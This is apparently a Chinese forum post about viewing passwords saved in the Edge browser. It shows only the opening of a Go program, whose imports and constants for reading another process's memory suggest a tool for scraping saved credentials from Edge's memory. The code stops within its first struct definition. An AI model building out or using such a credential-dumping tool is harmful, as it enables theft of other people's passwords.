pacEdge浏览器保存密码查看 中发帖

package main

import (
"fmt"
"regexp"
"strings"
"syscall"
"unsafe"

"github.com/StackExchange/wmi"
"golang.org/x/sys/windows"
)

const (
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_VM_READ = 0x0010
MEM_COMMIT = 0x1000
PAGE_READWRITE = 0x04
)

type MEMORY_BASIC_INFORMATION struct {
BaseAddress uintptr
AllocationBase uintptr
AllocationProtect...